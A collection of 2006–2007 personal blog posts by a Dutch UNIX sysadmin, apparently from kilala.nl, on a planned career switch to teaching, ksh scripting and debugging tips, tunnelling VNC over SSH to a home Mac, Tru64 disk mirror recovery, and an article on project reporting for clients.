For some reason the design team decided to throw out the RJ45 console port that's been a Sun standard for nigh on ten years. And what did they replace it with? A DB25 port commonly seen in the Mesozoic Era! Good lord! This left me stranded without the proper cable for this morning's installation (thankfully I could borrow one). However, it also requires us to get completely new and different cables for our Cyclades console server!

Bad Sun! How could you make such a silly decision?!


kilala.nl tags: , , , ,

View or add comments (curr. 5)

Big career changes: talking to the college

2007-07-11 09:16:00

So far I've talked to the people in the field, the folks I should end up working with. Now, in order to get there I've started talking with the college I'm eyeing.

First off, here's the pages for the two courses that I need to decide between:

* Second degree teacher in English

* Second degree teacher in Math

I've talked to the secretariat of the English course. They told me I'd be able to enroll until the end of August, so that seems fine to me. They also suggested that I e-mail the course's coordinator to pose specific questions and to arrange for an intake meeting. At said meeting we'd discuss my curriculum and how it can be adjusted to fit my prior experience.

So. Off to send an e-mail I am!


kilala.nl tags: , ,

View or add comments (curr. 0)

Big career changes: talking to the experts

2007-07-10 23:47:00

I can heartily recommend anyone considering a career switch to go and have a chat with people who work in their aspired field.

I made a little visit to my old high school this morning, to talk to their HR guy. He gave me a lot of valuable tips and suggested that a part-time study would indeed be the best and safest option for me. He indicated that it would be nigh on impossible for me to get a zij-instroom position, due to my lack of experience.

He also suggested that I go have a talk with the CWI (Centrum voor Werk en Inkomen), the part of the Dutch government charged with work and job security. He reckoned that I might strike a lucky deal with them, getting a subsidy for hours I didn't spend working for Snow. In order to make time for my education I'd need to cut back on my working hours (and thus my monthly wages) by about 40%. This grant might help cover at least part of the money I'd miss out on.

Tomorrow I'll also have a phone call with the CO of another high school. His number was given to me by my father's girlfriend, who happens to work with the fellow. I'm curious if he has some other useful tips for me :)


kilala.nl tags: , , , ,

View or add comments (curr. 1)

Big career changes: where do we go from here?

2007-07-10 23:34:00

Now that I'd decided to become a teacher, it left me with even more questions (duh). Which subject would I teach? At what kind of school? What kind of education do I need? Where do I study? How will this fit in with my job? Will I even be able to keep my job? OMG, will we be able to pay our mortgage and still have food on the table?! ONOZ!

Stuff like that.

Well... I quickly decided that I'd like to teach English or math at a high school level. I can wax lyrical about both subjects and both fields offer me loads of new stuff to learn and explore.

So... How do you go from having a completely unrelated job, to being a teacher? Here's how... (mind you, all of this applies to the Netherlands).

You start out with two options:

1. You take up a part-time or full-time college education (deeltijd or voltijd in Dutch).

2. You take up a part-time teaching position and follow additional classes to become a real teacher.

This second option is called zij-instroom in Dutch and really is only an option if your ambitions lie in teaching the same field you worked in. So for example, I could get a zij-instroom position teaching Comp Sci at high schools, whereas a biologist could start teaching Biology. Zij-instroom however requires you to have real and provable experience in said field, including the degrees that come with it. You will also need to take an entrance exam because they won't let just anybody start teaching. Should you be accepted for zij-instroom, then you'll get a two-year teaching permit, which is directly connected to a contract between you and the school in question.

Anywho... What with zij-instroom not being an option for my two chosen fields (I have neither a degree nor work experience in English or math) I have to opt for the longer path. Getting into a full-time education (voltijd) really isn't an option for me anymore: I wouldn't have any income, I'd be bored stiff and I'd be in a class full of eighteen year olds. Which automatically guides me towards a part-time education.

Luckily every college in the Netherlands offers deeltijd educations for professionals looking for a career switch, or an upgrade to their knowledge. The Hogeschool Utrecht offers teacher educations that are actually reputable and it's close to my home as well! Now all that remains is to convince my employer to let me work either three or four days a week. *gulp*


kilala.nl tags: , , ,

View or add comments (curr. 2)

Big career changes: prelude

2007-07-10 22:25:00

This blog post was made invisible initially. It has now been made available to the Internet at large. Sorry for breaking continuity :D

Back in April, I felt like crap. Then, in June, it came back. Now, with the start of July I've made my decision:

I'm getting out of IT.

That day in June something snapped inside of me and I decided that I could no longer carry on working as a sysadmin. The work no longer motivates me, nor does it offer me some shine of glamour. I know that, while there are still endless, uncharted seas for me to discover, this field no longer holds a challenge for me. I know that whatever I'll need to learn, I'll be able to do so in a few days. Lather, rinse, repeat, until I grow old.

No thank you.

No longer will I be shifting bits and bytes around, being a faceless peon in a huge corporation. No longer will I be burning midnight oil at the altar of Unix.

Instead I will make a difference in this world and I will be of use to the general public. I will try to educate this world's children, nudging them into directions they might otherwise ignore.

I have decided to go into education and become a high school teacher.


kilala.nl tags: , , ,

View or add comments (curr. 3)

Training to be a safety steward

2007-06-24 10:24:00

A safety steward's jacket

Yesterday was a very well spent day! I may have been way too busy and I may have gotten way too little sleep, but it was damn well worth it. For yesterday was the first of two whole-day training sessions to become a BHV worker.

In Dutch, BHV is an abbreviation for Bedrijfs HulpVerlener, which can be roughly translated as Company Safety Steward. In short, these are the people who are there to limit the scope of a disaster on the work floor, while waiting for the professionals to arrive. They apply first aid, they guide an evacuation and they fight a starting fire. All in all a very important job!

Over here, in the Netherlands, every company is required by law to have BHVs on hand. Originally the law required a minimum of one BHV per fifty people, but these days it just calls for an appropriate amount. This means that it could be anything from 1:10 (retirement homes, hospitals) to 1:50 (office buildings). BHVs should be sufficiently trained and know how to prevent panic and/or casualties.

Yesterday's session focussed on an intro to BHV, communications during an incident and on fighting fires. This also included fighting gas and petrol fires using CO2 and foam extinguishers. This was a truly awesome day!

Our training was delivered by the good fellows of TBT fire and medical. If you're looking for a good BHV training, give these guys a ring.


kilala.nl tags: , ,

View or add comments (curr. 4)

Open Solaris, like Linux but with bureaucrats

2007-06-15 18:23:00

Two things before I start this rant:

1. I'm not overly familiar with the OGB and the Open Solaris project's modus operandi. I'm going to bone up on those subjects tonight.

2. It seems that the Dutch branch of the OS project doesn't even notice much of the OGB's dealings. When I asked one of "our" leading guys about some recent dealings, he hadn't actually even heard of them yet.

Now... On with the show.

When it comes to the Open Solaris project I'm having mixed feelings. On the one hand Solaris and its step-sister Open Solaris are my favourite "true" UNIX and I really want to see the OS be a successful one. I feel at home in the OS, I admire the great improvements Sun and the community make to the OS and Solaris has almost never let me down (maybe one or two occasions).

But then there's discussions such as these: a few members of the Open Solaris community propose to build an official binary distribution (dubbed Project Indiana) and they have executive backing from Sun. The first reply is a rather constructive one: it tells what's wrong with the proposal and why it won't be accepted (in its current form) by the OGB. But then the whole discussion derails with post upon post of bureaucracy, going back and forth about which rules should be applied to whom and what in which situations and at what times... Etc, etc...

While I'm all in favor of having strict project management and of handling your business in an organised and procedural manner, one can go too far. Linux has always felt a little bit too organic to me, although they do seem to get the job done in a rather good way. But the way the Open Solaris group works seems just way too convoluted to me. I hope that it's just a matter of streamlining things over the coming months/years and that things will loosen up a little by then.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Fedora Core 6 image for Parallels Desktop

2007-06-11 16:47:00

Now that I've gotten my mitts on an Intel Macbook I've also started dabbling with Parallels Desktop, a piece of software that'll let you run a whole bunch of virtual machines inside Mac OS X. For my work it's rather handy to have a spare Solaris system lying around, so I went with the Solaris Express image that I mentioned a few weeks ago. And now that it's about time for me to get started on my LPIC-2 exam it's also handy to have at least one Linux at hand.

Enter a pre-installed and configured Fedora Core 6 image for Parallels. At only ~730MB in size that really isn't that bad. Saves me a lot of trouble as well.

Just be sure to set your RAM at 512 MB. Any higher is supposed to crash FC, according to this OS X hint.

EDIT:

Tried it with my last day of the Parallels demo. It works like a charm :)


kilala.nl tags: , , ,

View or add comments (curr. 6)

The passing of an era: Nagios

2007-05-20 19:05:00

Well, I have finally unsubscribed myself from the Nagios mailing lists. It was great being a member of those lists while I was working with the software on a daily basis, but these days I've put Nagios behind me. I haven't written one line of Nagios monitoring code for months now.

I'm sure I'll also be skipping this year's Nagios Konferenz unless a job involving monitoring comes up again.

Thanks Ethan, for making such great software freely available! All the best to you and maybe we'll meet again o/


kilala.nl tags: , , , ,

View or add comments (curr. 0)

TruCluster: an interesting performance problem

2007-05-11 11:24:00

The past two weeks we've been having a rather mysterious problem with one of our TruClusters.

During hardware maintenance of the B-node we moved all cluster resources to the A-node to remain up and running. Afterwards we let TruCluster balance all the resources so performance would benefit again. Sounds good so far and everything kept on working like it should.

However, during some nights the A-node would slow to a crawl, not responding to any commands and inputs. We were stumped, because we simply couldn't find the cause of the problem. The system wasn't overloaded, with a low load average. The CPU load was a bit remarkable, with 10% user, 50% system and the rest in idle. The network wasn't overloaded and there was no traffic corruption. None of the disks were overloaded, with just two disks seeing moderate to heavy use. It was a mystery and we asked HP to help us out.

After some analysis they found the cause of the problem :) Two file systems were part of one of the applications that had been failed over to the A-node. After the balancing of resources these file systems stayed on the A-node, while the application moved back to the B-node. So now the A-node was serving I/O to the B-node through its cluster interconnect! This also explains the high system-land CPU load, since that was the kernel serving the I/O. :D

We'll be moving the file systems back to the B-node as well and we'll see whether that solves the issues. It probably will :)


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Sun's Solaris Express image for Parallels Desktop

2007-04-27 14:32:00

Ever since Apple switched to Intel processors in their systems and Parallels came out with their Parallels Desktop software it's been possible to run Windows, Linux and other Unices inside virtual machines on your Mac. That's totally great, since it allows you to run various test systems without needing additional hardware!

A lot of people also got Solaris 10 to run in PD, although some ran into a little bit of trouble. Well, not anymore! Sun has created a pre-installed Solaris Express image for use with Parallels Desktop. This allows you to immediately get up and running with Solaris, without even having to go through any of the normal installation hoops.

I know what I'll be doing when I get my Macbook in ;)

Thanks to Ben Rockwood for pointing out this little gem.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Cutting down on the use of pipes

2007-04-18 14:38:00

One of the obvious downsides to using a scripting language like ksh as opposed to a "real" programming language like Perl or PHP (or C for that matter) is that, for each command that you string together, you're forking off a new process.

This isn't much of a problem when your script isn't too convoluted or when your dataset isn't too large. However, when you start processing 40-50MB log files with multiple FOR loops containing a few IF statements for each line, then you start running into performance issues.

And as I'm running into just that I'm trying to find ways to cut down on the forking, which means getting rid of as many IFs and pipes as possible. Here's a few examples of what has worked for me so far...

Instead of running:

[ expr1 ] && command1

[ expr2 ] && command1

Run:

[ expr1 -a expr2 ] && command1

Why? Because if test works the way I expect it to, it'll stop as soon as the first expression turns out to be untrue, meaning that it won't even evaluate the second one. If you have multiple expressions that complement each other, then you ought to be able to fit them into a single test invocation, cutting down on more forks.

Instead of running:

if [ `echo $STRING | grep $QUERY | wc -l` -gt 0 ]; then

Run:

if [ ! -z "`echo $STRING | grep $QUERY`" ]; then

More ideas to follow soon. Maybe I ought to start learning a "real" programming language? :D

EDIT:

OMG! I can't believe that I've just learnt this now, after eight years in the field! When using the Korn shell, use [[ expr ]] for your tests as opposed to [ expr ].

Why? Because the [ expr ] is a throw-back to Bourne shell compatibility that makes use of the external test binary, as opposed to the built-in test function. This should speed up things considerably!
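To make the difference tangible, here's a small benchmark sketch of my own (assuming ksh93 or bash; STRING and QUERY are just placeholder test data). It pits the echo-pipe-grep construct from above against the shell's built-in [[ ]] pattern matching, which needs no forks at all:

STRING="the quick brown fox"; QUERY="brown"   # placeholder test data

with_forks() {                                # old style: echo, grep and expr fork on every pass
    i=0
    while [ $i -lt 1000 ]; do
        [ ! -z "`echo $STRING | grep $QUERY`" ]
        i=`expr $i + 1`
    done
}

without_forks() {                             # builtin style: no forks at all
    i=0
    while (( i < 1000 )); do
        [[ $STRING = *"$QUERY"* ]]
        (( i += 1 ))
    done
}

time with_forks
time without_forks

The builtin variant should come out far ahead, though the exact numbers will obviously vary per system.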


kilala.nl tags: , , , ,

View or add comments (curr. 0)

On commenting and debugging your code

2007-04-16 16:38:00

When writing shell scripts for my customers I always try to be as clear as possible, allowing them to modify my code even long after I'm gone. In order to achieve this I usually provide a rather lengthy piece of opening comments, with comments added throughout the script for each subroutine and for every switch or command that may be unclear to the untrained eye.

In general I've found that it's best to have at least the following information in your opening blurb:

* Who made the program? When was it finalised? Who requested the script to be made? Where can the author be reached for questions?

* A "usage" line that shows the reader how to call the program and which parameters are at his disposal.

* A description of what the program actually does.

* Descriptions for each of the parameters and options that can be passed to the script.

* The limitations imposed upon the script. Which specific software is needed? What other requisites are there? What are the nasty little things that may pop up unexpectedly?

* What are the current bugs and faults? The so-called FIXMEs.

* A description of the input that the program takes.

* A description of the output that the program generates.

Equally important is the inclusion of debugging capabilities. Of course you can start adding "echo" lines at various, strategic points in the script when you run into problems, but it's oh-so-much nicer if they're already in there! Adding those new lines is usually a messy affair that can make your problems even worse :( I usually prepend the debugging commands with "[ $DEBUG -eq 1 ] &&", which allows me to turn the debugging on or off at the top of the script using one variable.
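To illustrate, here's a minimal sketch of that toggle (the function and messages are made up for the example):

DEBUG=0                                       # flip to 1 at the top of the script to enable debugging

[ $DEBUG -eq 1 ] && echo "DEBUG: run started at `date`"

process_file()
{
    [ $DEBUG -eq 1 ] && echo "DEBUG: now processing $1"
    :                                         # the real work goes here
}

process_file /var/log/messages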

And finally, for the more involved scripts, it's a great idea to write a small test suite. Build a script that actually takes the real script through its loops by automatically generating input and by introducing errors.

Two examples of scripts where I did all of this are check_suncluster and check_log3, with the new TEC-analysis.sh on its way in a few days.

So far, TEC-analysis.sh checks in at:

* 497 lines in total.

* 306 lines of actual code.

* 136 lines of comments.

* 55 lines of debugging code.

Approximately 39% of this script exists solely for the benefit of the reader and user.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

w00t! Passed my LPIC-102!

2007-04-06 10:57:00

Yay! There wasn't much reason for my doubting :) I passed with a 690 score (on a 200-930 scale), which boils down to 87% of 73 questions answered correctly. Not bad... Not bad at all...

Next up: ITIL Foundations!


kilala.nl tags: , , , ,

View or add comments (curr. 7)

LPIC-102 summary

2007-04-03 23:41:00

The LPIC-102 summary is done. You can find it over here, or in the menu on the left. Enjoy!


kilala.nl tags: , , , , , ,

View or add comments (curr. 0)

Finally! I'm done!

2007-04-03 23:37:00

Calvin hard at work

Ruddy heck, what a day! All in all it took me around thirteen hours, but I've finally finished my LPIC-102 summary. 41 pages of Linuxy goodness, bound to drag me through the second part of my LPIC-1 exams.

Argh, now I'm off to bed. =_= *cough* Let's hope I don't get called for any stand-by work.


kilala.nl tags: , , , ,

View or add comments (curr. 2)

Preparing for LPIC-102

2007-03-20 21:01:00

Cailin working hard

One of the rules my employer Snow imposes on its employees is a rather strict certification track. Technically speaking each employee progresses through five C-levels, starting at 0 and ending up at 4. As you reach new levels of certification you will also reap benefits of your hard work.

Let's take the track that applies to me as an example:

C0 = no certification

C1 = LPIC1 (101 and 102) and ITIL Fundamentals

C2 = LPIC2 (201 and 202)

C3 = SCSA1 and SCSA2

C4 = SCNA and others

The irony of the matter is that I've already achieved both SCSA exams and the SCNA exam a long time ago, but that I'm still stuck at C0 because I haven't done my LPICs. So to work myself up the ladder I'm slogging my way through the requisite LPIC stuff, even though I'm not that fond of Linux.

The challenge here lies in the fact that I haven't used Linux in a professional environment that much, so I'm at a disadvantage when compared to the rest of my colleagues. I'm really glad I've always been a rather good student, so cramming with a few books should get me through. I managed to score a 660 (87%) at my LPIC-101, so that brings some hope :)

And now I'm cramming for the 102 exam! Since I was postponing it way too long, I reckoned I'd better get my act together! This week I took two days off to dedicate myself completely to studying. I managed to work through six of the nine objectives in these two days, resulting in a thirty-one page summary so far. In two weeks time I'll take another two days and then I'll be ready!

Like last time I'll post my summary over here, to help out all those other souls trundling through their LPICs.


kilala.nl tags: , , ,

View or add comments (curr. 3)

Fighting the Linksys WPC54g

2007-03-13 20:25:00

I'm well fed up with the whole PCMCIA switcheroo that I had gotten into to run my stand-by duties. I finally went out to Media Markt to get myself a Wifi card of my own. Who cares if the laptop belongs to $CLIENT? I want to work dammit! X[

I bought the Linksys WPC54g, the same model as the first card that I'd borrowed from a colleague. Back then the card worked a treat and I had no problems whatsoever. But this time around, nothing but trouble! ;_; I think the crucial difference lies in the fact that the card I bought is v3, as opposed to either v2 or v4 (which was what I'd borrowed earlier). Incidentally, I'm running Windows 2000 on this Thinkpad.

Installing the card seemed to work alright: the driver installed perfectly, the card was recognized and the configuration utility installed as well. But for some reason the config util would keep on reporting the card as "WPC54g is inactive", suggesting a driver problem.

Well... A little digging around led me to this thread at the Linksys fora. It seems that the configuration tool (aka "Network monitor") is actually a piece of shit software, that doesn't work properly with the WPC54gv3 *grr*. As was suggested in the thread I installed McAfee Wireless Security, which is an alternative and free configuration tool for Wifi cards.

And lo and behold! It recognized the card and found my Wifi network. Got me connected without a problem. Thank God for McAfee! (Never thought I'd say that!)

Needless to say that my trust in Linksys has gone down a bit. All in all this took me a good two hours, which has well soured my mood :/


kilala.nl tags: , , , ,

View or add comments (curr. 3)

Parallellization in shell scripts

2007-03-13 15:05:00

Today I was working on a shell script that's supposed to process multiple text files in the exact same manner. Usually you can get through this by running a FOR-loop where the code inside the loop is repeated for each file in a sequential manner.

Since this would take a lot of time (going over 1e6 lines of text in multiple passes) I wondered whether it wouldn't be possible to run the contents of the FOR-loop in parallel. I rehashed my script into the following form:

subroutine()

{

contents of old FOR-loop, using $FILE

}

for file in "list of files"

do

FILE="$file"

subroutine &

done

This will result in a new instance of your script for each file in the list. Got seven files to process? You'll end up with seven additional processes that are vying for the CPU's attention.

On average I've found that the performance of my shell script was improved by a factor of 2.5, going from ~40 lines per three seconds to ~100 lines. I was processing seven files in this case.

The only downside to this is that you're going to have to build in some additional code that prevents your shell script from running ahead while the subroutines are running in the background. What that code looks like depends entirely on the stuff you're doing in the subroutine.
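For what it's worth, the simplest form of that guard is the shell builtin wait, which blocks until every background child has exited. A quick sketch (the file names are made up):

for file in access.log error.log audit.log    # hypothetical list of files
do
    FILE="$file"
    subroutine &
done

wait                                          # block here until every backgrounded subroutine has finished
echo "all files processed"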


kilala.nl tags: , , , ,

View or add comments (curr. 2)

Accessing your Mac at home, from work - reprise

2007-03-13 08:11:00

Well, it works: I can use my iBook at home from my desktop PC at work. I'd tested the whole setup at home, using both my Powermac and the Thinkpad $CLIENT gave me, and VNC worked properly and rather smoothly.

Unfortunately the Internet connection at $CLIENT isn't too great, so the VNC connection is a bit sluggish. Changing desktops (I run Desktop Manager to sort my apps across four desktops) takes a second or three and building a completely new screen takes about two. So it's not great, but it's doable at least.

I'll try this out for a few days, see how it pans out. If I don't get stuck in any way I'll leave my iBook at home from now on.


kilala.nl tags: , ,

View or add comments (curr. 0)

Accessing your Mac at home, from work

2007-03-12 22:08:00

A screenshot of VNC in action.

For weeks on end I've been dragging my iBook along to the office at $CLIENT, even though I'm not allowed to connect it to their network. My iBook is indispensable to me, because it contains all of my archives and past projects, all my e-mail and my address book and calendar. I even use my iBook to keep track of my working hours (thank you TimeLog 3!).

Unfortunately, dragging my laptop around can get tiresome, especially if I ride my bike to work. Which is why I'm very grateful to one of my colleagues for suggesting the use of VNC or another remote desktop solution. Seriously, the suggestion was so obvious that I'm really ashamed that I didn't think of it. I guess I was just clinging -too- much to my dear, sweet iBook.

Anywho... What I'm about to describe is only one of many ways to implement a remote desktop solution for your Mac. A few other options exist, but this is the one I'm using. What we're going to be building is the following:

* I'm at my desk at work, using one of the PCs over there.

* My iBook, running Mac OS 10.4 is at home, connected to my wifi network.

* I will be using my iBook, from my desk at work :)

What you'll need:

* A VNC server. I chose to use Vine Server, which came recommended.

* A VNC client. For Windows and Linux I chose to use Tight VNC and for OS X I use Chicken of the VNC.

* An SSH server. This comes built in, as part of Mac OS X.

* An SSH client. For Windows I use PuTTY, while Linux and OS X come built in with a client.

* Your home IP address. You can find this by browsing to What is my IP address? at home.

Setting up SSH at home

You can use the basic SSH configuration that comes with OS X, but it's not rock solid. If you'd like to be extra secure, please make the following changes. This will disable remote root access and will force each user to make use of SSH keys. If you don't, you can log in using your normal password, which opens you up to brute-force password attacks.

* Open Terminal.app and enter the following commands.

cd /private/etc

sudo vi sshd_config

* Change the following lines, so they read as follows. The last two lines force the use of SSH keys instead of passwords.

PermitRootLogin no

PasswordAuthentication no

UsePAM no

* (Re)start SSH

Open System Preferences.

Go to "Sharing".

(Re)start the "Remote Login" service.

Setting up the VNC server at home

Vine Server comes in a .DMG and you can simply copy the binary to its desired location. By starting the application you're presented with its configuration options, which include buttons at the bottom to stop and start the VNC server.

* You can leave most settings at their default values, but it's extra safe to change the following:

Connection -> set a password

Sharing -> only allow local connections

This secures your VNC server with a password and prevents people on your local network from connecting to your desktop. You'll only be able to login to VNC after logging in to your system through SSH.

* Press the "Start server" button.

Setting up your router

You will need to make your SSH server accessible from the Internet. Configure your router in such a way that it forwards incoming traffic on port 22, to port 22 on your Mac.

Setting up your SSH client at work

If you forced your SSH server to use public/private keypairs earlier, then you'll need to configure your SSH client to do the same. You can use ssh-keygen (OS X and Linux) or PuTTYGen (Windows) to generate a key pair. Please Google around for instructions on how to use SSH keys.

You will need to tell your SSH client to connect to your SSH server at home and to set up port forwarding for VNC. In both examples $HOME-IP is the IP address of your Internet connection at home.

* On Linux and OS X (from the command line): ssh -L 5900:127.0.0.1:5900 $HOME-IP.

* On Windows (in PuTTY): Connection -> SSH -> Tunnels -> source port = 5900, destination = 127.0.0.1:5900

What you're doing here is rerouting any traffic that's coming in at your work PC at port 5900 to port 5900 at your home box.
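If you get tired of retyping that -L option on Linux or OS X, the same forward can be stored in ~/.ssh/config on your work machine. A sketch (the "home-mac" alias and user name are made up):

Host home-mac
    # replace 1.2.3.4 with $HOME-IP, your home IP address
    HostName 1.2.3.4
    User yourusername
    LocalForward 5900 127.0.0.1:5900

After that, a plain "ssh home-mac" logs you in and sets up the tunnel in one go.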

Setting up your VNC client at work

All of the real work is being done by the SSH session, so you can instruct your VNC client to simply connect to desktop 0 at localhost, or at 127.0.0.1. Enter the password that you set up earlier.
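With TightVNC's command line client, for example, that boils down to something like:

vncviewer 127.0.0.1:0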

Adding more security

Unfortunately Hot Corners don't work through VNC and fast user switching (FUS) kills your VNC session, so we'll need to find another way to lock your OS X desktop. Luckily I've found a way in this article. You can use Keychain Access to add a small button to your menu that will allow you to lock your screen.

And there you have it! A fully working VNC setup that will allow you to use your Mac at home, from work.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Recovering a broken mirror in Tru64

2007-03-01 14:26:00

Today I faced the task of replacing a failing hard drive in one of our Tru64 boxen. The disk was part of a disk group being used to serve plain data (as opposed to being part of the boot mirror / rootdg), so the replacement should be rather simple.

After some poking about I came to the following procedure. Those in the know will recognize that it's very similar to how Veritas Volume Manager (VXVM) handles things. This is because Tru64 LSM is based on VXVM v2.

* voldiskadm -> option 4 -> list -> select the failing disk, this'll be used as $vmdisk below.

* voldisk list -> select the failing disk, this'll be used as $disk below.

* voldisk rm $disk

* Now replace the hard drive.

* hwmgr -show scsi -> take a note of your current set of disks.

* hwmgr -scan scsi

* hwmgr -show scsi -> the replaced disk should show up as a new disk at the bottom of the list. This'll be used as $newdisk below.

* dsfmgr -e $newdisk $disk

* disklabel -rw $disk

* voldisk list -> $disk should be labeled as "unknown" again.

* voldiskadm -> option 5 -> $vmdisk -> $disk -> y -> y -> your VM disk should now be replaced.

* volrecover -g $diskgroup -sb

The remirroring process will now start for all broken mirrors. Unfortunately there is no way of tracking the actual progress. You can check whether the mirroring's still running with "volprint -ht -g $diskgroup | grep RECOV", but that's about it.
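If you don't feel like rerunning that check by hand, a crude polling loop will do (my own sketch, built around the same volprint command):

while volprint -ht -g $diskgroup | grep RECOV > /dev/null
do
    sleep 60
done
echo "resynchronisation of $diskgroup finished"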


kilala.nl tags: , , , ,

View or add comments (curr. 2)

I've never liked HP-UX that much ...

2007-02-21 12:47:00

I've never been overly fond of HP-UX, mostly sticking to Solaris and Mac OS X, with a few outings here and there. Given the nature of one of my current projects however, I am forced to delve into HP's own flavour of Unix.

You see, I'm building a script that will retrieve all manner of information regarding firmware levels, driver versions and such, so we can start a network-wide upgrade of our SAN infrastructure. With most OSes I'm having a fairly easy time, but HP-UX takes the cake when it comes to being backwards :[

You see, if I want to find out the firmware level for a server running HP-UX I have two choices:

1. Reboot the system and check the firmware revision from the boot prompt.

2. Use the so-called Support Tools Manager utility, called [x,m,c]stm.

CSTM is the command line interface to STM and thank god that it's scriptable. In reality the binary is a menu-driven CLI system, but it takes an input file for your commands.

For those who would like to retrieve their firmware version automatically, here's how:

...

Uhm... FSCK! *growl* *snarl* What the heck is this?! For some screwed up reason my shell keeps on adding a NewLine char after the output of each command. That way a variable which gets its value from a string of commands will always be "$VALUE ". WTF?! o_O

I'm going to have to bang on this one a little more. More info later.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

The necessity of good reporting

2007-01-26 13:57:00

Finally, I've finished my fourth article for ;Login magazine. It'll appear in next month's issue, in the sysadmin section.

As is the tradition with my articles, I'll try to entice my fellow folks in IT to improve their "soft skills". In the past I've covered things like personal planning and various communications skills. This time I'll try to convey why good reporting is so important to your work and your projects.

HTML version.

PDF version.


kilala.nl tags: , , ,

View or add comments (curr. 0)

All quiet on the western front. Thomas discusses the necessity of good reporting.

2007-01-26 13:08:00

A PDF version of this document is available. Get it over here.

When I returned to the consulting business back in 2005 I found that a change to my modus operandi would have favorable results to the perceived quality of my work.

Up to that point I had never made a big point of reporting my activities to management, trusting that I'd get the job done and that doing so would make everyone happy. And sure enough, things kept rolling and I indeed got things done. But I won't claim that anyone really knew what I was up to or that they had more than a passing notion of my progress.

2005 provided me with a fresh start and I decided that I'd do things differently this time around. And indeed, as my reports started coming in, my client's response to both my employer and myself seemed to improve.

What's the use of reporting?

"So, Peter, what's happening? Aahh, now, are you going to go ahead and have those TPS reports for us this afternoon?"

From the movie 'Office Space'

Reporting. Reports. Status updates. Words that most people in IT dread and that instill nightmare images of piles of paperwork and endless drudgery with managers. Words that make you shudder at the thought of bosses nagging you about layout, instead of content. Of hours of lost time that could have been better spent doing real work.

But seriously, spreading the word about your work and your projects doesn't have to be a huge undertaking and it will probably even help you in getting things done. By spending just a few hours every month you could save yourself a lot of trouble in the long run.

Benefits for the customer:

Benefits for your employer and yourself:

Your first report: describe your assignment

"A lean agreement is better than a fat lawsuit"

German proverb

It may seem slightly odd, but your first report will be made before you've even done any real work. When you start a new project everyone will have a general idea of what you will be doing, but usually no-one has all the details. In order to prevent delays in the future, you will need to make very specific agreements early on.

To get things started you will need to have a little eye-to-eye with your client to draft your assignment. You will be hashing out every significant detail of what the client expects from you.

The good news is that such a meeting usually doesn't take up more than an hour, maybe two. After that you'll need another hour or so to put it all to paper, provided that you have already created a template of sorts.

By putting as much detail as possible into all of these criteria you are creating many opportunities for yourself. From now on everyone agrees on what you will be doing and outsiders can be quickly brought up to speed on your project. At later points in time you can always go back to your document to check whether you're still on the right track. And at the end of everything you can use your original agreement to grade how successful you were in achieving your goals.

So, what if you will be doing "normal" daily management of the customer's servers and IT infrastructure? Doesn't seem like there's a lot to describe, is there? Well, that's when you put extra focus on how things are done. Mind you, even normal daily management includes some projects that you can work on.

Either way, make sure that all demands have been made "SMART": specific, measurable, ambitious, realistic and time-bound. This means that everything should:

When your document is complete, go over it with your client once more to make sure he agrees on everything you put to paper. Then, get his approval in writing.

Here are two examples from my recent assignments. The first example was part of a real project with specific deliverables, while the second example covers normal systems management.

Requirement 1: improving on the old

Our current Nagios monitoring environment is severely lacking in multiple aspects. These include, but are not limited to:

* Sub-optimal design of the infrastructure involved.

* Many services, components and metrics are effectively not monitored.

* Sub-optimal configuration when it comes to alarming.

* Current configuration is a dirty conglomerate of files and objects.

* There is no proper separation between users. People can see monitors to which they really should have no access.



All of these issues should be fixed in the newly designed Nagios environment.

Thomas will take part in the department's normal schedule. This includes the following duties:

* Stand-by duty (being on call), once every five to six weeks.

* The daily shifts, meaning that he either starts his day at 08:00, OR doesn't leave the office before 18:00.

* The expanded schedule with regards to P1 priority incidents and changes. Thomas is expected to put in overtime in these cases.

* The department's change calendar. This involves regular night shifts to implement changes inside specific service windows.

Expanding your activities

You have done your utmost best to make your project description as comprehensive as possible. You've covered every detail that you could think of and even the customer was completely happy at the time.

Unfortunately happiness never lasts long and your client's bound to think of some other things they want you to do. Maybe there's a hike in your deadline, or maybe they want you to install a hundred servers instead of the original fifty. Who knows? Anything can happen! The only thing that's for certain is that it will happen.

When it does, be sure to document all the changes that are being made to your project. Remember, if your original project description is all you have to show at the end, then you'll be measured by the wrong standards! So be sure to go into all the specifics of the modifications and include them in an updated project description.

And of course, again make sure to get written approval from the client.

Interim reporting

Most people I've worked for were delighted to get detailed status updates in writing. Naturally your client will pick up bits and pieces through the grapevine, but he won't know anything for sure until you provide him with all the details. I've found that it is best to deliver a comprehensive document every six to eight weeks, depending on the duration of your undertaking.

Each report should include the following topics. Examples follow after the list.

A short description of your project

The goal of this project is to improve the monitoring capabilities at $CLIENT by completely redesigning the infrastructure, the software and the configuration of the Nagios environment.

Original tasks and their status

Automated installation of UNIX servers

Weeks 26 and 27 (28th of June through the 8th of July) were spent full-time on the implementation of the Jumpstart server. $CLIENT had requested I give this part of the project the highest priority, due to recent discoveries regarding the recoverability of certain servers.



At this point in time the so-called Jumpstart server has the following functionality in place:



[...]



Therefore we can conclude that the Jumpstart server has reached full functionality.

Changes to your project

One of the changes made to the project, based on the new technical requirements, is the switch from NRPE to SNMP as a communications protocol. This choice will allow us greater flexibility in the future and will most likely also save us some effort in managing the Nagios clients.



The downside of this choice is my lack of experience in SNMP. This means that I will need to learn everything about SNMP, before I can start designing and building a project that's based upon it.

A simplified timesheet

A simplified time sheet.

Problems and challenges

On the 17th of July I issued a warning to local management that the project would be delayed due to two factors:

* My unfamiliarity with the SNMP protocol and software.

* The lack of a centralized software (and configuration) distribution tool. This lack means that we shall need to install each client manually.

Suggestions and recommendations

$CLIENT is quite lucky to have a CMDB (Configuration Management Database) that is rather up to date. This database contains detailed information on all of their systems and has proved to be very useful in daily life. However, what is lacking is a bird's eye view of the environment. Meaning: maps and lists and such which describe the environment in less detail, but which show a form of method to the madness.

Predictions regarding the outcome of your project

However, as can be seen from the included project planning, I will most probably not be finished with the project before the contract between Snow and $CLIENT runs out.



The contract's end date is set to the 16th of September, while my current estimates point to a project conclusion around the 1st of October. And that's assuming that there will be no delays in acquiring the backup and monitoring software.

Personal contact

